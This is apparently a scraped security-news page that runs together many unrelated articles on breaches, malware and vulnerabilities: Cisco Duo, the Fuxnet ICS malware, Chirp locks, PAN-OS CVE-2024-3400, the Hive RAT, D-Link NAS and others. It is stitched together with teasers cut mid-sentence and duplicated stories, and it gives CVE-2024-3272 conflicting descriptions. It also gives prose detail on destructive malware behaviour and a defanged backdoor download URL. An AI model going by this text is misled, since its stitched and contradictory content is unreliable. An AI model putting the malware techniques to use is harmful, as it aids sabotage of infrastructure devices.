Cisco Duo warns that a data breach involving one of its telephony suppliers exposed multifactor authentication (MFA) messages sent by the company via SMS and VOIP to its customers.
Cisco Duo warns of a data breach involving one of its telephony suppliers, compromising multifactor authentication (MFA) messages sent to customers via SMS and VOIP.
The security breach occurred on April 1, 2024, the threat actors used a Provider employee’s credentials that illicitly obtained through a phishing attack. Then they used the access to download a set of MFA SMS message logs belonging to customers’ Duo accounts.
“More specifically, the threat actor downloaded message logs for SMS messages that were sent to certain users under your Duo account between March 1, 2024 and March 31, 2024. The message logs did not contain any message content but did contain the phone number, phone carrier, country, and state to which each message was sent, as well as other metadata (e.g., date and time of the message, type of message, etc.).” reads the data breach notification send to the impacted individuals. “The Provider confirmed that the threat actor did not download or otherwise access the content of any messages or use their access to the Provider’s internal systems to send any messages to any of the numbers contained in the message logs.”
Threat actors had access to phone numbers, phone carriers, countries, and states to which each message was sent. Attackers also obtained other metadata, including the date and time of the message, type of message, etc..
Once discovered the incident, the Provider immediately launched an investigation and implemented mitigation measures. The Provider invalidated the employee’s credentials and analyzed the logs. The
“Provider also started implementing measures to prevent similar incidents from occurring in the future and additional technical measures to further mitigate the risk associated with social engineering attacks. The Provider confirmed that they will also require employees to undergo additional social engineering awareness training.” continues the notification.
Affected users whose phone numbers were in the logs are recommended to remain vigilant and promptly report any suspected activities.
The Ukrainian hacking group Blackjack used a destructive ICS malware dubbed Fuxnet in attacks against Russian infrastructure.
Industrial and enterprise IoT cybersecurity firm Claroty reported that the Ukrainian Blackjack hacking group claims to have damaged emergency detection and response capabilities in Moscow and beyond the Russian capital using a destructive ICS malware dubbed Fuxnet.
The Blackjack group is believed to be affiliated with Ukrainian intelligence services that carried out other attacks against Russian targets, including an internet provider and a military infrastructure.
The group claims to have attacked Moscollector, a Moscow-based company, that is responsible for the construction and monitoring of underground water and sewage and communications infrastructure.
The website ruexfil.com provided detailed information about the attacks against Moscollector, the hackers also published screenshots of monitoring systems, servers, and databases they claim to have compromised.
The site also hosts password dumps allegedly stolen from the Russian company.
Below is the timeline of the attack published on ruexfil.com:
Initial access June 2023. - Access to 112 Emergency Service. - 87,000 sensors and controls have been disabled (including Airports, subways, gas-pipelines, ...). - Fuxnet (stuxnet on steroids) was deployed earlier to slowly and physically destroy sensory equipment (by NAND/SSD exhaustion and introducing bad CRC into the firmware). (YouTube Video 1, YouTube Video 2). - Fuxnet has now started to flood the RS485/MBus and is sending 'random' commands to 87,000 embedded control and sensory systems (carefully excluding hospitals, airports, ...and other civilian targets). - All servers have been deleted. All routers have been reset to factory reset. Most workstations (including the admins workstations) have been deleted. - Access to the office building has been disabled (all key-cards have been invalidated). - Moscollector has recently been certified by the FSB for being 'secure & trusted' (picture included) - Defaced the webpage (https://web.archive.org/web/20240409020908/https://moscollector.ru/)
The website reported that Blackjack destroyed about 1,700 sensor routers deployed at airports, subways, gas-pipelines. The group also disrupted the central command-dispatcher and database. The attack brought all 87,000 sensors offline, threat actors also wiped databases, backups, and email servers, a total of 30TB of data.
“Fuxnet has now started to flood the RS485/MBus and is sending ‘random’ commands to 87,000 embedded control and sensory systems (carefully excluding hospitals, airports, …and other civilian targets).” states the website.
Team82 and Claroty have been unable to verify the attackers’ claims, however, they conducted a detailed analysis of the Fuxnet malware relying on information provided by the attackers.
“For example, Blackjack claims to have damaged or destroyed 87,000 remote sensors and IoT collectors. However, our analysis of data leaked by Blackjack, including the Fuxnet malware, indicates that only a little more than 500 sensor gateways were bricked by the malware in the attack, and the remote sensors and controllers likely remain intact.” reads the analysis published by Claroty. “If the gateways were indeed damaged, the repairs could be extensive given that these devices are spread out geographically across Moscow and its suburbs, and must be either replaced or their firmware must be individually reflashed.”
The attack chain sees hackers targeting a list of sensor gateways IPs. Threat actors distributed their malware to each target, likely either through remote-access protocols such as SSH or the sensor protocol (SBK) over port 4321.
Upon running on the target device, the malware initiates a new child process to lock out the device. The malicious code remounts the filesystem with write access, then delete essential filesystem files and directories and disables remote access services such as SSH, HTTP, telnet, and SNMP. This prevents remote access for restoring operations even if the router remains functional.
Subsequently, the threat actors erase the router’s routing table, rendering its communication with other devices non-functional. Finally, the malware deletes the filesystem and rewrites the flash memory using the operating system’s mtdblock devices.
Once it has corrupted the file system and isolated the device, the malware attempts to destroy the NAND memory chip physically and rewrites the UBI volume to prevent rebooting.
“In order to ensure the sensor does not reboot again, the malware rewrites the UBI volume. First, the malware uses the IOCTL interface UBI_IOCVOLUP allowing it to interact with the management layer controlling the flash memory, which tells the kernel that the UBI volume will be rewritten, and that x-number of bytes will be written.” continues the report. “In its normal behavior, the kernel will know that the rewrite is finished only when x-number of bytes were written. However, the malware will not write x-number of bytes to the UBI, instead it will write fewer bytes than it declares, causing the device to wait for the rewrite to finish indefinitely.”
The malware overwrites the UBI volume with junk data (0xFF), making the UBI useless and the filesystem becomes unstable.
The malware also tries to disrupt gateway-connected sensors by flooding serial channels with random data, overloading the serial bus and the sensors.
“The attackers developed and deployed malware that targeted the gateways and deleted filesystems, directories, disabled remote access services, routing services for each device, and rewrote flash memory, destroyed NAND memory chips, UBI volumes and other actions that further disrupted operation of these gateways.” concludes the report.
A security flaw impacting the Lighttpd web server used in baseboard management controllers (BMCs) has remained unpatched by device vendors like Intel and Lenovo, new findings from Binarly reveal.
While the original shortcoming was discovered and patched by the Lighttpd maintainers way back in August 2018 with version 1.4.51, the lack of a CVE identifier or an advisory meant that
The U.S. government is warning that “smart locks” securing entry to an estimated 50,000 dwellings nationwide contain hard-coded credentials that can be used to remotely open any of the locks. The lock’s maker Chirp Systems remains unresponsive, even though it was first notified about the critical weakness in March 2021. Meanwhile, Chirp’s parent company, RealPage, Inc., is being sued by multiple U.S. states for allegedly colluding with landlords to illegally raise rents.
On March 7, 2024, the U.S. Cybersecurity & Infrastructure Security Agency (CISA) warned about a remotely exploitable vulnerability with “low attack complexity” in Chirp Systems smart locks.
“Chirp Access improperly stores credentials within its source code, potentially exposing sensitive information to unauthorized access,” CISA’s alert warned, assigning the bug a CVSS (badness) rating of 9.1 (out of a possible 10). “Chirp Systems has not responded to requests to work with CISA to mitigate this vulnerability.”
Matt Brown, the researcher CISA credits with reporting the flaw, is a senior systems development engineer at Amazon Web Services. Brown said he discovered the weakness and reported it to Chirp in March 2021, after the company that manages his apartment building started using Chirp smart locks and told everyone to install Chirp’s app to get in and out of their apartments.
“I use Android, which has a pretty simple workflow for downloading and decompiling the APK apps,” Brown told KrebsOnSecurity. “Given that I am pretty picky about what I trust on my devices, I downloaded Chirp and after decompiling, found that they were storing passwords and private key strings in a file.”
Using those hard-coded credentials, Brown found an attacker could then connect to an application programming interface (API) that Chirp uses which is managed by smart lock vendor August.com, and use that to enumerate and remotely lock or unlock any door in any building that uses the technology.
Brown said when he complained to his leasing office, they sold him a small $50 key fob that uses Near-Field Communications (NFC) to toggle the lock when he brings the fob close to his front door. But he said the fob doesn’t eliminate the ability for anyone to remotely unlock his front door using the exposed credentials and the Chirp mobile app.
A smart lock enabled with Chirp. Image: Camdenliving.com
Also, the fobs pass the credentials to his front door over the air in plain text, meaning someone could clone the fob just by bumping against him with a smartphone app made to read and write NFC tags.
Neither August nor Chirp Systems responded to requests for comment. It’s unclear exactly how many apartments and other residences are using the vulnerable Chirp locks, but multiple articles about the company from 2020 state that approximately 50,000 units use Chirp smart locks with August’s API.
Roughly a year before Brown reported the flaw to Chirp Systems, the company was bought by RealPage, a firm founded in 1998 as a developer of multifamily property management and data analytics software. In 2021, RealPage was acquired by the private equity giant Thoma Bravo.
Brown said the exposure he found in Chirp’s products is “an obvious flaw that is super easy to fix.”
“It’s just a matter of them being motivated to do it,” he said. “But they’re part of a private equity company now, so they’re not answerable to anybody. It’s too bad, because it’s not like residents of [the affected] properties have another choice. It’s either agree to use the app or move.”
In October 2022, an investigation by ProPublica examined RealPage’s dominance in the rent-setting software market, and that it found “uses a mysterious algorithm to help landlords push the highest possible rents on tenants.”
“For tenants, the system upends the practice of negotiating with apartment building staff,” ProPublica found. “RealPage discourages bargaining with renters and has even recommended that landlords in some cases accept a lower occupancy rate in order to raise rents and make more money. One of the algorithm’s developers told ProPublica that leasing agents had ‘too much empathy’ compared to computer generated pricing.”
Last year, the U.S. Department of Justice threw its weight behind a massive lawsuit filed by dozens of tenants who are accusing the $9 billion apartment software company of helping landlords collude to inflate rents.
In February 2024, attorneys general for Arizona and the District of Columbia sued RealPage, alleging RealPage’s software helped create a rental monopoly.
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Palo Alto Networks PAN-OS Command Injection flaw to its Known Exploited Vulnerabilities catalog.
CVE-2024-3400 (CVSS score of 10.0) is a critical command injection vulnerability in Palo Alto Networks PAN-OS software. An unauthenticated attacker can exploit the flaw to execute arbitrary code with root privileges on affected firewalls. This flaw impacts PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with GlobalProtect gateway or GlobalProtect portal (or both) and device telemetry enabled.
Palo Alto Networks and Unit 42 are investigating the activity related to CVE-2024-3400 PAN-OS flaw and discovered that threat actors have been exploiting it since March 26, 2024.
The researchers are tracking this cluster of activity, conducted by an unknown threat actor, under the name Operation MidnightEclipse.
“Palo Alto Networks is aware of malicious exploitation of this issue. We are tracking the initial exploitation of this vulnerability under the name Operation MidnightEclipse, as we assess with high confidence that known exploitation we’ve analyzed thus far is limited to a single threat actor.” reads the report. “We also assess that additional threat actors may attempt exploitation in the future.”
Upon exploiting the flaw, the threat actor was observed creating a cronjob that would run every minute to access commands hosted on an external server that would execute via bash.
The researchers were unable to access the commands executed by the attackers, however, they believe threat actors attempted to deploy a second Python-based backdoor on the vulnerable devices.
Researchers at cybersecurity firm Volexity referred this second Python backdor as UPSTYLE.
The threat actor, tracked by Volexity as UTA0218, remotely exploited the firewall device to establish a reverse shell and install additional tools. Their primary objective was to extract configuration data from the devices and then use it as a foothold to expand laterally within the targeted organizations.
“During its investigation, Volexity observed that UTA0218 attempted to install a custom Python backdoor, which Volexity calls UPSTYLE, on the firewall. The UPSTYLE backdoor allows the attacker to execute additional commands on the device via specially crafted network requests. Details on this backdoor are included further on in this report.” reads the report published by Volexity. “As Volexity broadened its investigation, it discovered successful exploitation at multiple other customers and organizations dating back to March 26, 2024. Those attempts appear to be the threat actor testing the vulnerability by placing zero-byte files on firewall devices to validate exploitability.”
Imagine a world where the software that powers your favorite apps, secures your online transactions, and keeps your digital life could be outsmarted and taken over by a cleverly disguised piece of code. This isn't a plot from the latest cyber-thriller; it's actually been a reality for years now. How this will change – in a positive or negative direction – as artificial intelligence (AI) takes on
The threat actor known as Muddled Libra has been observed actively targeting software-as-a-service (SaaS) applications and cloud service provider (CSP) environments in a bid to exfiltrate sensitive data.
"Organizations often store a variety of data in SaaS applications and use services from CSPs," Palo Alto Networks Unit 42 said in a report published last week.
"The threat
Threat actors have been exploiting the recently disclosed zero-day in Palo Alto Networks PAN-OS since March 26, 2024.
Palo Alto Networks and Unit 42 are investigating the activity related to CVE-2024-3400 PAN-OS flaw and discovered that threat actors have been exploiting it since March 26, 2024.
CVE-2024-3400 (CVSS score of 10.0) is a critical command injection vulnerability in Palo Alto Networks PAN-OS software. An unauthenticated attacker can exploit the flaw to execute arbitrary code with root privileges on affected firewalls. This flaw impacts PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with GlobalProtect gateway or GlobalProtect portal (or both) and device telemetry enabled.
The researchers are tracking this cluster of activity, conducted by an unknown threat actor, under the name Operation MidnightEclipse.
“Palo Alto Networks is aware of malicious exploitation of this issue. We are tracking the initial exploitation of this vulnerability under the name Operation MidnightEclipse, as we assess with high confidence that known exploitation we’ve analyzed thus far is limited to a single threat actor.” reads the report. “We also assess that additional threat actors may attempt exploitation in the future.”
Upon exploiting the flaw, the threat actor was observed creating a cronjob that would run every minute to access commands hosted on an external server that would execute via bash.
The researchers were unable to access the commands executed by the attackers, however, they believe threat actors attempted to deploy a second Python-based backdoor on the vulnerable devices.
Researchers at cybersecurity firm Volexity referred this second Python backdor as UPSTYLE.
The UPSTYLE backdoor was hosted at hxxp://144.172.79[.]92/update.py, but Unit42 observed a similar backdoor hosted at nhdata.s3-us-west-2.amazonaws[.]com. According to the HTTP headers, the threat actor last modified it on April 7, 2024.
The first Python payload creates and executes another Python script (“system.pth”), which then decrypts and launches the embedded backdoor component, that executes the attackers’s command in a file named “sslvpn_ngx_error.log.”
After execution, the script records the command output in the file:
[snip]/css/bootstrap.min.css
A noteworthy aspect of the attack sequence is that both the files used for command extraction and result logging are authentic files linked with the firewall:
“The script will then create another thread that runs a function called restore. The restore function takes the original content of the bootstrap.min.css file, as well as the original access and modified times, sleeps for 15 seconds and writes the original contents back to the file and sets the access and modified times to their originals.” continues the report. “The point of this function is to avoid leaving the output of the commands available for analysis. Also, this suggests that the threat actor has automation built into the client side of this backdoor, as they only have 15 seconds to grab the results before the backdoor overwrites the file.“
The threat actor, tracked by Volexity as UTA0218, remotely exploited the firewall device to establish a reverse shell and install additional tools. Their primary objective was to extract configuration data from the devices and then use it as a foothold to expand laterally within the targeted organizations.
“During its investigation, Volexity observed that UTA0218 attempted to install a custom Python backdoor, which Volexity calls UPSTYLE, on the firewall. The UPSTYLE backdoor allows the attacker to execute additional commands on the device via specially crafted network requests. Details on this backdoor are included further on in this report.” reads the report published by Volexity. “As Volexity broadened its investigation, it discovered successful exploitation at multiple other customers and organizations dating back to March 26, 2024. Those attempts appear to be the threat actor testing the vulnerability by placing zero-byte files on firewall devices to validate exploitability.”
“After successfully exploiting devices, UTA0218 downloaded additional tooling from remote servers they controlled in order to facilitate access to victims’ internal networks. They quickly moved laterally through victims’ networks, extracting sensitive credentials and other files that would enable access during and potentially after the intrusion.” concludes Volexity. “The tradecraft and speed employed by the attacker suggests a highly capable threat actor with a clear playbook of what to access to further their objectives.”
To minimize the risk of privilege misuse, a trend in the privileged access management (PAM) solution market involves implementing just-in-time (JIT) privileged access. This approach to privileged identity management aims to mitigate the risks associated with prolonged high-level access by granting privileges temporarily and only when necessary, rather than providing users with
Cybersecurity researchers have discovered a "renewed" cyber espionage campaign targeting users in South Asia with the aim of delivering an Apple iOS spyware implant called LightSpy.
"The latest iteration of LightSpy, dubbed 'F_Warehouse,' boasts a modular framework with extensive spying features," the BlackBerry Threat Research and Intelligence Team said in a report published last
Palo Alto Networks has released hotfixes to address a maximum-severity security flaw impacting PAN-OS software that has come under active exploitation in the wild.
Tracked as CVE-2024-3400 (CVSS score: 10.0), the critical vulnerability is a case of command injection in the GlobalProtect feature that an unauthenticated attacker could weaponize to execute arbitrary code with root
A joint investigation conducted by U.S. and Australian authorities led to the arrest of two key figures behind the Firebird RAT operation.
A joint law enforcement operation conducted by the Australian Federal Police (AFP) and the FBI resulted in the arrest and charging of two individuals suspected of creating and selling the Firebird RAT, which was later renamed as Hive.
Australian Federal Police reported that an Australian man and a man based in the US will appear in court, following the international investigation that began in 2020. The Australian man faces twelve counts of computer offenses.
The Australian man developed and sold Firebird to customers on a dedicated hacking forum.
The RAT allowed customers to access and control their victims’ computers remotely, its author advertised its stealing capabilities.
Last week, the FBI arrested Edmond Chakhmakhchyan, 24, of Van Nuys, on charges of marketing and selling the RAT. Chakhmakhchyan, aka “Corruption,” was apprehended by FBI agents and pleaded not guilty to two charges. He is accused of advertising and selling the Hive remote access trojan (RAT) on the “Hack Forums” website. The man was accepting Bitcoin payments for licenses and offering customer service to buyers.
“Customers purchasing the malware “would transmit Hive RAT to protected computers and gain unauthorized control over and access to these computers, which allowed the RAT purchaser to close or disable programs, browse files, record keystrokes, access incoming and outgoing communications, and steal victim passwords and other credentials for bank accounts and cryptocurrency wallets, all without the victims’ knowledge or permission,” according to the indictment.” reported the DoJ. “Chakhmakhchyan allegedly began working with the creator of the Hive RAT, previously known as “Firebird,” approximately four years ago, and advertised online the RAT’s many features, including features that allowed the owner to remotely access victim computers and intercept communications and data without the victim knowing.“
According to the indictment, Chakhmakhchyan engaged in electronic communication with buyers after advertising the Hive RAT. He explained to one buyer that the malware allowed access to another person’s computer without their knowledge. When informed that the target had significant cryptocurrency and project files, Chakhmakhchyan agreed to sell the Hive RAT.
“After this purchaser told Chakhmakhchyan that “the point” of using the Hive RAT was because the victim had “20k in bitcoin on a blockchain wallet” and “project files worth over 5k,” Chakhmakhchyan agreed to sell the Hive RAT, the indictment alleges.” continues DoJ.
The DoJ states that the man allegedly sold a license to an undercover law enforcement agent. Chakhmakhchyan faces charges of conspiracy and advertising a device as an interception device, each carrying a maximum penalty of five years in federal prison.
Chakhmakhchyan could face up to ten years in prison, while the maximum penalty for the Australian man is three years imprisonment.
A threat actor claimed the hack of the Canadian retail chain Giant Tiger and leaked 2.8 million records on a hacker forum.
A threat actor, who goes online with the moniker ShopifyGUY, claimed responsibility for hacking the Canadian retail chain Giant Tiger and leaked 2.8 million records on a hacker forum.
Giant Tiger is a Canadian discount store chain that operates over 260 stores across Canada. The threat actor responsible for the post claims to have uploaded the complete database of the company that was stolen in March 2024.
The threat actor behind the post claims to have uploaded the “full” database of Giant Tiger customer records stolen in March 2024. The compromised data include email addresses, names, phone numbers, physical addresses, and website activity. Financial data was not impacted in the alleged incident.
“In March 2024, the Canadian discount store chain Giant Tiger Stores Limited (https://www.gianttiger.com/) suffered a data breach that exposed over 2.8 million clients. The breach includes over 2.8 million unique email addresses, names, phone numbers and physical addresses. The data was breached by @ShopifyGUY” reads the announcement published by ShopifyGUY on Breachforums.
Every member of the forum can download the archive for 8 credits.
Customers of the Canadian retail chain can check for the presence of their data in the leaked archive by querying the data breach monitoring service HaveIBeenPwned.
New breach: Canadian retailer Giant Tiger had 2.8M records breached last month. Impacted data included email and physical address, name and phone. 46% were already in @haveibeenpwned. Read more: https://t.co/71a7YAVQvl
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box.
Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press.
Researchers warn threat actors are manipulating GitHub search results to target developers with persistent malware.
Checkmarx researchers reported that threat actors are manipulating GitHub search results to deliver persistent malware to developers systems.
Attackers behind this campaign create malicious repositories with popular names and topics, they were observed using techniques like automated updates and fake stars to boost search rankings.
“By leveraging GitHub Actions, the attackers automatically update the repositories at a very high frequency by modifying a file, usually called “log”, with the current date and time or just some random small change. This continuous activity artificially boosts the repositories’ visibility, especially for instances where users filter their results by “most recently updated,” increasing the likelihood of unsuspecting users finding and accessing them.” reads the report published by Checkmarx. “While automatic updates help, the attackers combine another technique to amplify the effectiveness of their repo making it to the top results. The attackers employed multiple fake accounts to add bogus stars, creating an illusion of popularity and trustworthiness.”
To evade detection, threat actors concealed the malicious code in Visual Studio project files (.csproj or .vcxproj), it is automatically executed when the project is built.
The researchers noticed that the payload is delivered based on the victim’s origin, and is not distributed to users in Russia.
In the recent campaign, the threat actors used a sizable, padded executable file that shares similarities with the “Keyzetsu clipper” malware.
The recent malware campaign involves a large, padded executable file that shares similarities with the “Keyzetsu clipper” malware, targeting cryptocurrency wallets.
On April 3rd, the attacker updated the code in one of their repositories, linking to a new URL that downloads a different encrypted .7z file. The archive contained an executable named feedbackAPI.exe.
Threat actors padded the executable with numerous zeros to artificially increase the file size surpassing the limit of various security solutions, notably VirusTotal, making it unscannable.
The malware maintains persistence by creating a scheduled task that runs the executable every day at 4AM without user confirmation.
“The use of malicious GitHub repositories to distribute malware is an ongoing trend that poses a significant threat to the open-source ecosystem. By exploiting GitHub’s search functionality and manipulating repository properties, attackers can lure unsuspecting users into downloading and executing malicious code.” concludes the report. “These incidents highlight the necessity for manual code reviews or the use of specialized tools that perform thorough code inspections for malware. Merely checking for known vulnerabilities is insufficient.“
A critical vulnerability, named ‘BatBadBut’, impacts multiple programming languages, its exploitation can lead to command injection in Windows applications.
The cybersecurity researcher RyotaK (@ryotkak ) discovered a critical vulnerability, dubbed BatBadBut, which impacts multiple programming languages.
When specific conditions are satisfied, an attacker can exploit the flaw to perform command injection on Windows.
“The BatBadBut is a vulnerability that allows an attacker to perform command injection on Windows applications that indirectly depend on the CreateProcess function when the specific conditions are satisfied.” wrote the researcher. “CreateProcess() implicitly spawns cmd.exe when executing batch files (.bat, .cmd, etc.), even if the application didn’t specify them in the command line.“
Due to Windows’ default inclusion of .bat and .cmd files in the PATHEXT environment variable, some runtimes inadvertently execute batch files instead of the intended commands. This can lead to arbitrary command executions, even if a snippet like the following one doesn’t explicitly include .bat or .cmd files.
RyotaK explained that OS executes batch files with ‘cmd exe’, which has complicated parsing rules for the command arguments, and programming language runtimes fail to escape the command arguments properly. The majority of programming languages provide their interface to the ‘CreateProcess’ function, however, they fail to escape the command arguments properly passed to the function.
Below is the list of conditions that must be satisfied to exploit BatBadBut:
The application executes a command on Windows
The application doesn’t specify the file extension of the command, or the file extension is .bat or .cmd
The command being executed contains user-controlled input as part of the command arguments
The runtime of the programming language fails to escape the command arguments for cmd.exe properly2
The researcher already notified the maintainers of the impacted programming languages, who have taken steps to address the flaw.
The CERT/CC from Carnegie Mellon University published an advisory on this issue. Four different CVE identifiers, respectively CVE-2024-1874, CVE-2024-22423, CVE-2024-24576, and CVE-2024-3566, have been assigned to this issue.
“Various programming languages lack proper validation mechanisms for commands and in some cases also fail to escape arguments correctly when invoking commands within a Microsoft Windows environment.” reads the advisory. “The command injection vulnerability in these programming languages, when running on Windows, allows attackers to execute arbitrary code disguised as arguments to the command. This vulnerability may also affect the application that executes commands without specifying the file extension.”
A former security engineer has been sentenced to three years in prison in the U.S. for charges relating to hacking two decentralized cryptocurrency exchanges in July 2022 and stealing over $12.3 million.
Shakeeb Ahmed, the defendant in question, pled guilty to one count of computer fraud in December 2023 following his arrest in July.
"At the time of both attacks,
The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) on Friday announced sanctions against an official associated with Hamas for his involvement in cyber influence operations.
Hudhayfa Samir ‘Abdallah al-Kahlut, 39, also known as Abu Ubaida, has served as the public spokesperson of Izz al-Din al-Qassam Brigades, the military wing of Hamas, since at least 2007.
"He publicly
Threat actors have been exploiting the newly disclosed zero-day flaw in Palo
Alto Networks PAN-OS software dating back to March 26, 2024, nearly three
weeks before it came to light yesterday.
The network security company's Unit 42 division is tracking the activity under the name Operation MidnightEclipse, attributing it as the work of a single threat actor of
Roku announced that 576,000 accounts were compromised in a new wave of credential stuffing attacks.
Roku announced that 576,000 accounts were hacked in new credential stuffing attacks, threat actors used credentials stolen from third-party platforms.
“Credential stuffing is a type of attack in which hackers use automation and lists of compromised usernames and passwords to defeat authentication and authorization mechanisms, with the end goal of account takeover (ATO) and/or data exfiltration.” In other words, bad actors glean lists of breached usernames and passwords and run them against desired logins until they find some that work. Then, they enter those accounts to abuse permissions, siphoning out data, or both.
Earlier this year, Roku detected unusual account activity and discovered that unauthorized actors accessed around 15,000 user accounts using login credentials obtained from a different source through “credential stuffing.”
Once the company concluded the investigation of this first security breach, they notified the impacted customers in early March. The company continued to monitor account activity and identified a second incident that impacted approximately 576,000 additional accounts.
“There is no indication that Roku was the source of the account credentials used in these attacks or that Roku’s systems were compromised in either incident. Rather, it is likely that login credentials used in these attacks were taken from another source, like another online account, where the affected users may have used the same credentials.” reads the press release published by the company. “In less than 400 cases, malicious actors logged in and made unauthorized purchases of streaming service subscriptions and Roku hardware products using the payment method stored in these accounts, but they did not gain access to any sensitive information, including full credit card numbers or other full payment information.”
The company announced the implementation of measures to prevent future incidents, including password resets for the affected accounts. Roku also plans to refund unauthorized purchases and is implementing two-factor authentication (2FA) for all accounts. Roku aims to simplify this process and offers support for users needing assistance.
The company has enabled two-factor authentication (2FA) by default for all customer accounts.
The company recommends customers use strong and unique passwords for their accounts and be vigilant for suspicious activities.
"Test files" associated with the XZ Utils backdoor have made their way to a Rust crate known as liblzma-sys, new findings from Phylum reveal.
liblzma-sys, which has been downloaded over 21,000 times to date, provides Rust developers with bindings to the liblzma implementation, an underlying library that is part of the XZ Utils data compression software. The
Crooks targeted a LastPass employee using deepfake technology to impersonate the company’s CEO in a fraudulent scheme.
In a fraudulent scheme, criminals used deepfake technology to impersonate LastPass ‘s CEO, targeting an employee of the company.
The attack occurred this week, but the employed recognized the attack and the attempt failed. According to the password management software firm, the employee was contacted outside of the business hours.
Deepfakes are created using generative AI, attackers manipulate audio and/or visual data to fabricate content of interest of a targeted individual. The rise in quality and accessibility of deepfake technology poses concerns for both political and private sectors, with numerous readily available tools enabling their creation.
“In our case, an employee received a series of calls, texts, and at least one voicemail featuring an audio deepfake from a threat actor impersonating our CEO via WhatsApp.” reported LastPass. “As the attempted communication was outside of normal business communication channels and due to the employee’s suspicion regarding the presence of many of the hallmarks of a social engineering attempt (such as forced urgency), our employee rightly ignored the messages and reported the incident to our internal security team so that we could take steps to both mitigate the threat and raise awareness of the tactic both internally and externally.”
The employee ignored the contact and reported the attempt to the security team, the company confirmed that the incident did not impact the company.
LastPass shared the incident to raise awareness about using deepfakes for CEO fraud and other scams.
In October 2022, cybersecurity firm Resecurity identified a new spike of underground services enabling bad actors to generate deepfakes. According to company, this may be used for political propaganda, foreign influence activity, disinformation, scams, and fraud.
“Impressing the importance of verifying potentially suspicious contacts by individuals claiming to be with your company through established and approved internal communications channels is an important lesson to take away from this attempt.” concludes the report.
Identities now transcend human boundaries. Within each line of code and every API call lies a non-human identity. These entities act as programmatic access keys, enabling authentication and facilitating interactions among systems and services, which are essential for every API call, database query, or storage account access. As we depend on multi-factor authentication and passwords to safeguard
TA547 group is targeting dozens of German organizations with an information stealer called Rhadamanthys, Proofpoint warns.
Proofpoint researchers observed a threat actor, tracked as TA547, targeting German organizations with an email campaign delivering the Rhadamanthys malware.
TA547 is a financially motivated threat actor that has been active since at least November 2017, it was observed conducting multiple campaigns to deliver a variety of Android and Windows malware, including DanaBot, Gootkit, Lumma stealer, NetSupport RAT, Ursnif, and ZLoader. The group also operates as an initial access broker (IAB) and targets various geographic regions.
The security firm pointed out that this is the first TA547 group to use this malware family. In past campaigns, the group used a PowerShell script likely generated by large language model (LLM) such as ChatGPT, Gemini, CoPilot, etc.
The TA547 group sent emails to the victims impersonating the German retail company Metro, purportedly related to invoices.
The messages contain a password-protected ZIP file containing an LNK file when opened. Upon executing the LNK file, it triggers PowerShell to run a remote PowerShell script. The remote PowerShell script decoded the Base64-encoded Rhadamanthys executable file stored in a variable and loaded it as an assembly into memory and then executed it. The experts noticed that the malicious code is executed directly in memory without writing any artifact to disk.
“Notably, when deobfuscated, the second PowerShell script that was used to load Rhadamanthys contained interesting characteristics not commonly observed in code used by threat actors (or legitimate programmers). Specifically, the PowerShell script included a pound sign followed by grammatically correct and hyper specific comments above each component of the script.” reads the report published by Proofpoint. “This is a typical output of LLM-generated coding content, and suggests TA547 used some type of LLM-enabled tool to write (or rewrite) the PowerShell, or copied the script from another source that had used it.”
This campaign exemplifies a shift in techniques by the threat actor, utilizing compressed LNKs and the previously unseen Rhadamanthys stealer malware. The experts also discovered the attempts of using LLM in malware campaigns.
“LLMs can assist threat actors in understanding more sophisticated attack chains used by other threat actors, enabling them to repurpose these techniques once they understand the functionality. Like LLM-generated social engineering lures, threat actors may incorporate these resources into an overall campaign.” concludes the report. “It is important to note, however, that while TA547 incorporated suspected LLM-generated content into the overall attack chain, it did not change the functionality or the efficacy of the malware or change the way security tools defended against it. In this case, the potentially LLM-generated code was a script which assisted in delivering a malware payload but was not observed to alter the payload itself.”
The report includes Indicators of compromise (IoCs).
The Iranian threat actor known as MuddyWater has been attributed to a new command-and-control (C2) infrastructure called DarkBeatC2, becoming the latest such tool in its arsenal after SimpleHarm, MuddyC3, PhonyC2, and MuddyC2Go.
"While occasionally switching to a new remote administration tool or changing their C2 framework, MuddyWater’s methods remain constant," Deep
Palo Alto Networks is warning that a critical flaw impacting PAN-OS software used in its GlobalProtect gateways is being actively exploited in the wild.
Tracked as CVE-2024-3400, the issue has a CVSS score of 10.0, indicating maximum severity.
"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct
Cybersecurity researchers have discovered a credit card skimmer that's concealed within a fake Meta Pixel tracker script in an attempt to evade detection.
Sucuri said that the malware is injected into websites through tools that allow for custom code, such as WordPress plugins like Simple Custom CSS and JS or the "Miscellaneous Scripts" section of the Magento admin panel.
"
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday issued an emergency directive (ED 24-02) urging federal agencies to hunt for signs of compromise and enact preventive measures following the recent compromise of Microsoft's systems that led to the theft of email correspondence with the company.
The attack, which came to light earlier this year, has been
CVE-2024-3272 D-Link Multiple NAS Devices Use of Hard-Coded Credentials Vulnerability
CVE-2024-3273 D-Link Multiple NAS Devices Command Injection Vulnerability
The flaw CVE-2024-3272 is a Use of Hard-Coded Credentials Vulnerability impacting D-Link Multiple NAS Devices. The flaw affects D-Link DNS-320L, DNS-325, DNS-327L, and DNS-340L, these devices contain a hard-coded credential that allows an attacker to conduct authenticated command injection, leading to remote, unauthorized code execution. CISA pointed out that the flaw affects D-Link products that have reached their end-of-life (EOL) or end-of-service (EOS) life cycle, for this reason, they should be retired and replaced per vendor instructions.
The flaw CVE-2024-3272 is a Command Injection Vulnerability impacting D-Link Multiple NAS Devices. The vulnerability impacts D-Link DNS-320L, DNS-325, DNS-327L, and DNS-340L, which contain a command injection vulnerability. Chaining CVE-2024-3272 and CVE-2024-3273 an attacker can achieve remote, unauthorized code execution.
This flaw also affects D-Link products that have reached their end-of-life (EOL) or end-of-service (EOS) life cycle, for this reason, they should be retired and replaced per vendor instructions.
Login
